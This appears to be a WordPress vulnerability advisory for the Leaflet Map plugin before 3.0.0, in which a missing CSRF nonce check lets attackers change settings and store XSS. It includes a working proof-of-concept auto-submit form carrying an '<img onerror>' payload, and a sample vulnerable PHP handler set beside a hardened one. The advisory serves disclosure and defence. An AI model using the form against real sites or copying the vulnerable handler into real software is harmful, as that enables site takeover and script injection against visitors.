WordPress Plugin Vulnerabilities

Leaflet Map < 3.0.0 - Arbitrary Settings Update via CSRF Leading to Stored XSS

Description

The plugin does not verify the CSRF nonce when saving its settings, which allows attackers to make a logged-in admin update the settings via a Cross-Site Request Forgery attack. This could lead to Cross-Site Scripting issues by either changing the URL of the JavaScript library being used, or by supplying a malicious attribution string, which is then executed on every page that embeds a map from the plugin.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=leaflet-map" method="POST">
      <input type="hidden" name="default_lat" value="44.67" />
      <input type="hidden" name="default_lng" value="-63.61" />
      <input type="hidden" name="default_zoom" value="12" />
      <input type="hidden" name="default_height" value="250" />
      <input type="hidden" name="default_width" value="100%" />
      <input type="hidden" name="default_min_zoom" value="0" />
      <input type="hidden" name="default_max_zoom" value="20" />
      <input type="hidden" name="default_tiling_service" value="other" />
      <input type="hidden" name="mapquest_appkey" value="Supply an API key if you choose MapQuest" />
      <input type="hidden" name="map_tile_url" value="https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" />
      <input type="hidden" name="map_tile_url_subdomains" value="abc" />
      <input type="hidden" name="tilesize" value="" />
      <input type="hidden" name="mapid" value="" />
      <input type="hidden" name="accesstoken" value="" />
      <input type="hidden" name="zoomoffset" value="" />
      <input type="hidden" name="js_url" value="https://unpkg.com/[email protected]/dist/leaflet.js" />
      <input type="hidden" name="css_url" value="https://unpkg.com/[email protected]/dist/leaflet.css" />
      <input type="hidden" name="default_attribution" value="<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="geocoder" value="osm" />
      <input type="hidden" name="google_appkey" value="Supply a Google API Key" />
      <input type="hidden" name="togeojson_url" value="https://unpkg.com/@mapbox/[email protected]/togeojson.js" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
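The root cause named in the description is a settings handler that trusts the POST body without checking a nonce. The following is an added example, not the Leaflet Map plugin's own code: a hypothetical WordPress settings handler in its vulnerable form beside a hardened one that verifies the nonce, checks the caller's capability, and constrains the two settings the advisory points at (the script URL and the attribution HTML). The function names, option keys, nonce action name, page slug and text domain are all assumptions.

```php
<?php
// Added example (hypothetical plugin), not code from the Leaflet Map plugin.

// --- Vulnerable pattern: settings written straight from $_POST ---------------
// Any page the logged-in admin visits can auto-submit a form to this endpoint,
// because nothing ties the request to a form WordPress rendered for that user.
function example_save_settings_vulnerable() {
    if ( ! isset( $_POST['submit'] ) ) {
        return;
    }
    // No nonce check, no capability check, no sanitization.
    update_option( 'example_js_url', $_POST['js_url'] );
    update_option( 'example_default_attribution', $_POST['default_attribution'] );
}

// --- Hardened pattern ----------------------------------------------------------
// The form embeds a nonce bound to this action and to the current user session.
function example_render_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=example-map' ) ); ?>">
        <?php wp_nonce_field( 'example_save_settings', 'example_nonce' ); ?>
        <input type="text" name="js_url"
               value="<?php echo esc_attr( get_option( 'example_js_url', '' ) ); ?>" />
        <textarea name="default_attribution"><?php
            echo esc_textarea( get_option( 'example_default_attribution', '' ) );
        ?></textarea>
        <?php submit_button(); ?>
    </form>
    <?php
}

function example_save_settings_hardened() {
    if ( ! isset( $_POST['submit'] ) ) {
        return;
    }
    // Authorization: only users who may manage options can save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'example' ), '', array( 'response' => 403 ) );
    }
    // CSRF defence: check_admin_referer() dies unless the nonce matches the
    // action name and the current user; a cross-site form cannot supply it.
    check_admin_referer( 'example_save_settings', 'example_nonce' );

    // The script source must be an http(s) URL; anything else becomes ''.
    $js_url = isset( $_POST['js_url'] )
        ? esc_url_raw( wp_unslash( $_POST['js_url'] ), array( 'http', 'https' ) )
        : '';

    // Attribution is rendered as HTML on every map, so allow only a small,
    // event-handler-free tag set. An <img onerror=...> payload is stripped.
    $allowed_html = array(
        'a'      => array( 'href' => array(), 'title' => array(), 'rel' => array(), 'target' => array() ),
        'strong' => array(),
        'em'     => array(),
    );
    $attribution = isset( $_POST['default_attribution'] )
        ? wp_kses( wp_unslash( $_POST['default_attribution'] ), $allowed_html )
        : '';

    update_option( 'example_js_url', $js_url );
    update_option( 'example_default_attribution', $attribution );
}

// When the map is rendered, apply the same allow-list again rather than
// trusting the stored value, so a legacy value saved before the fix is
// also neutralised at output time.
function example_render_attribution() {
    $allowed_html = array(
        'a'      => array( 'href' => array(), 'title' => array(), 'rel' => array(), 'target' => array() ),
        'strong' => array(),
        'em'     => array(),
    );
    return wp_kses( get_option( 'example_default_attribution', '' ), $allowed_html );
}
```

Verifying the nonce is what closes the CSRF; the capability check and the output-side `wp_kses` are the defence in depth that keep a stored attribution from turning into the script execution the advisory describes, even if a value was saved before the plugin was updated.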

Affects Plugins

Fixed in 3.0.0

References

Classification

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes

Timeline

Publicly Published
2021-07-01 (about 2 years ago)
Added
2021-07-07 (about 2 years ago)
Last Updated
2022-02-13 (about 1 year ago)

Other